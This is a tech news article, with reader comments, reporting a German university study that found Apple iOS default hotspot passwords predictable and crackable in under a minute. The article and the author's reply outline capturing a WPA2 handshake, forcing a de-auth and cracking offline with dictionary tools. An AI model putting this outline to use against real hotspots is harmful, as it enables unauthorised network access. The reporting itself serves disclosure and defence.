Researchers able to predict Apple iOS-generated hotspot passwords

Researchers able to predict Apple iOS-generated hotspot passwords

Summary: Although iOS generates seemingly random passwords for its hotspots to eliminate the use of 'default' passwords, researchers at a German university have found that they are able to break these passwords in under a minute.

TOPICS: Security, Apple, iOS

Researchers at the University of Erlangen in Germany have found a flaw in the automatically generated pre-shared keys used in Apple's iOS hotspots that could make them susceptible to attack in under a minute.

Under iOS, users have the option to specify their own passwords to secure their device when it is used as a personal hotspot. However, for convenience and security, Apple initially populates the password field with an automatically generated password. This ensures that even users who are not security conscious enough to change their password from the default will be protected from those attempting to access their phone with a default password.

However, according to three researchers from the German university, the method in which these passwords are generated leaves them vulnerable to attack. According to their paper, Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots (PDF), the passwords are a combination of a short dictionary word followed by a series of random numbers.

This does allow each password to be different, but, according to the researchers, an attacker can easily determine what passwords iOS uses for its defaults, because there is a limited list of words that are used to generate the password.

"This list consists of around 52,500 entries, and was originated from an open-source Scrabble crossword game. Using this unofficial Scrabble word list within offline dictionary attacks, we already had a 100 percent success rate of cracking any arbitrary iOS hotspot default password," the researchers wrote.

After capturing the wi-fi connection handshake, the researchers used an AMD Radeon HD 6990 GPU to iterate over all items in the list, including the permutations of additional numbers, taking them 49 minutes to brute force the password.

But the passwords used by the operating system aren't always picked at random. In fact, the researchers found that only a small subset of the 52,500 entries were being used.

"Only 1,842 different entries of that dictionary are taken into consideration. Consequently, any default password used within an arbitrary iOS mobile hotspot is based on one of these 1,842 different words."

This, combined with an increase in cracking hardware — a GPU cluster consisting of four AMD Radeon HD 7970s — allowed the researchers to crack any iOS hotspot with an OS-generated password within 50 seconds. Although such hardware is physically out of the reach of most users, the researchers said that similar resources are easily available through today's cloud computing technologies.

The paper criticises the approach of making such hotspot passwords easy to remember, and calls for vendors to use truly randomised passwords as their defaults.

"In the context of mobile hotspots, there is no need to create easily memorisable passwords. After a device has been paired once by typing out the displayed hotspot password, the entered credentials are usually cached within the associating device, and are reused within subsequent connections," the paper states.

"System-generated passwords should be reasonably long, and should use a reasonably large character set. Consequently, hotspot passwords should be composed of completely random sequences of letters, numbers, and special characters."

It should be noted that Apple does, however, do more for consumers than many other vendors that simply have static passwords as their defaults. Likewise, Windows Phone and Android may have similar issues.

"Default passwords in Windows Phone 8 consist of only eight-digit numbers. As this results in a search space of 108 candidates, attacks on Windows-based hotspot passwords might be practicable. Moreover, while the official version of Android generates strong passwords, some vendors modified the wi-fi-related components utilised in their devices and weakened the algorithm of generating default passwords."

Topics: Security, Apple, iOS

Michael Lee

About Michael Lee

A Sydney, Australia-based journalist, Michael Lee covers a gamut of news in the technology space including information security, state Government initiatives, and local startups.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.


Log in or register to join the discussion
  • 49 minutes is a long time

    For hackers to take to break into your network. One thing to note is that when you have a connection to your hotspot, you will see a message on the top part of your screen that your hotspot has X number of connections, so if you have one device connected to your hotspot and you notice that more than one device is connected, turn the hotspot off and change your password.
    • The other thing I found interesting was...

      The paper centered on finding the password and not actually (from what I could tell) logging on to the phone and getting the password authenticated. They were able to get a password and then have their program guess the password in about 1 minute using a high-end GPU. Is there any indication iOS can handle 390,000 login attempts/sec needed to achieve these break-in times? I mean, that is a flurry of traffic and processing on the phone side. If the phone is limited to 10 or 100 attempts/sec (a feature Apple does frequently to make brute force attacks harder), the times needed to actually crack the password could be 2-3 orders of magnitude higher. The report was ambiguous on this point.

      I found the distribution of word frequency interesting.

      It could be you just start sending out passwords and then you find out you are logged in.
      • Offline cracking

        The issue is, and I didn't mention this in the article for technical brevity, is that an attacker only requires the WPA2 handshake when a Wi-Fi connection is made. They can either wait and quietly sniff this traffic, or they can force a de-auth and capture it when the client re-associates (although this is noisier and could arouse suspicion).

        With the handshake, an attacker can brute force the password offline. Up to this point, this is the same as any attack on WPA2. If you'd like to know more, I'd recommend taking a look at the Aircrack-ng suite of tools (for educational reasons, of course). The kicker here is that rather than brute-forcing every known possibility, which would take ages, there is a limited subset of possibilities that can easily tested against.

        With the password cracked offline, iOS only ever sees the correct credentials entered and perhaps a de-auth attempt, if it is used. It never sees thousands of login attempts (and issues with network latency, if this approach was taken, would definitely slow things down).

        The moral of the story here is to make sure you use a different password than the one provided and keep a look out for any suspicious connections. That applies equally, no matter if you're using iOS, Android or any other mobile operating system.

        Michael Lee (Mukimu)
  • So Windows Phone is even easier to crack

    "Default passwords in Windows Phone 8 consist of only eight-digit numbers."

    So Windows Phone is even easier to crack, but giving the article an "Apple Fail" headline is much better for business.
    • It makes wintards feel better

      They don't have much to feel better about nowadays...
    • 1842 . .

      "Only 1,842 different entries of that dictionary are taken into consideration. Consequently, any default password used within an arbitrary iOS mobile hotspot is based on one of these 1,842 different words."

      1842 is basically a bit less than a 4 digit number. Almost as weak as a 3 digit number.
      • 1842 plus some...

        It's the word plus some numbers (not sure how many though). It's weak but still need to be accurate.
        • Plus four.

          It's plus four. Which makes iOS somewhere between the strength of a 7 digit and an 8 digit number.

          It's better to just change the password regardless =).
    • Lets see

      So you got 1852 entries used in the IOS for the passord. And windows phone is 8 to the power of 10. Which give you 1,073,741,824. Yup you are right even easier to hack. Really in the end does it matter. A hacker that wants to get into a device or system, can if they really try. The randomizing of passwords is to deter the average hacker.
    • Wrong!

      That is all.
    • ..."but giving the article an "Apple Fail" headline..."

      Of course the article was "Apple Fail" orientated, since the research paper the article was explaining about is titled "Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots" and being a helpful author instead of just posting the link he did some research to show that other mobile OS's can have the same security hole was well.

      Don't defend Apple by saying "Well the other guys are doing it as bad so don't point at us"
  • So what happens while you are trying 1800

    Different wrong passwords to join the hotspot? Do you get locked out after three attempts? Do you get a forced increasing delay between each try? If you have to have a sixty minute cooling off period after your fifth wrong password attempt, you crack isn't worth much.

    These studies never take these factors into account when they scream about vulnerabilities.
    • It is an important consideration.

      There is no part of the report stating they actually LOGGED into a hotspot only that they were able to brute force the password with 390,000 guesses/sec when they already knew the password. I don't think iOS (or any mobile OS) could handle 390,000 authentication attempts/sec.

      Still cool research but a bit weak on some details.
    • Try reading

      And readers never take into account the actual article before they scream about inaccuracies in an article.

      If you read the article in detail and the actual research document you would of have noticed that they can hack it OFFLINE once they have intercepted the handshake.

      "For this, an attacker needs to capture a 4-way handshake between a Wi-Fi enabled device and the mobile hotspot. Afterwards, brute force or targeted dictionary attacks can be conducted to determine the PSK within offline computations."
  • Change that password is the lesson.

    First: This is a rarely used feature. And probably highly dependent on whether your phone company allows tethering.

    Second: The lesson here is to change that default password to something secure.

    "This, combined with an increase in cracking hardware — a GPU cluster consisting of four AMD Radeon HD 7970s — allowed the researchers to crack any iOS hotspot with an OS-generated password within 50 seconds. Although such hardware is physically out of the reach of most users . . ."

    Many gamers likely have 2-3 video cards in tandem thanks to SLI/CrossFireX. Quad SLI *is* possible, but extremely expensive due to the need for both a specialized motherboard and four GPUs.

    Dual Radeon HD 7990s may actually do the job, as AMD is claiming they have more than double the TFLOPs than the 7970s.

    That being said, a hacker may be willing to wait 2 or 4 times as long, if they believe the hotspot will be open for a while.

    And it should be noted that these are desktop cards - hardly portable. If somebody's hauling around a big desktop at your airport . . .

    Of course, if it takes this much horsepower for what's essentially a dictionary attack, they haven't a chance if you were to simply change to a good random password. Change that password!
    • Average hackers probably won't even attempt this.

      Serious hackers on the other hand could sit in a public place and use a cloud computing service to grab stuff all day.

      It's highly unlikely that this would affect most people, but it's still good to know about.
  • Yeah, but

    who is going to be within 10 feet of you with mega powered computers, typing away to break into your hot spot, when it is so easy to just use any of the open wireless routers that are ubiquitous nowadays.

    Seems like this is much ado about nothing.
    • "who is going to be within 10 feet of you with mega powered computers...?"

      The guy with a laptop and an account at some large cloud computing service.
  • How to avoid this poor iOS password implementation?

    The best way available for iOS device ( or wherever device with gyroscope and GPS) is to allow the user to choose a guess word and then, shake the device. ( a classic crypto symmetric algorithm generator) . The position and the shake are a truly random issue. Then, problem solved (for a very long time) for long key base.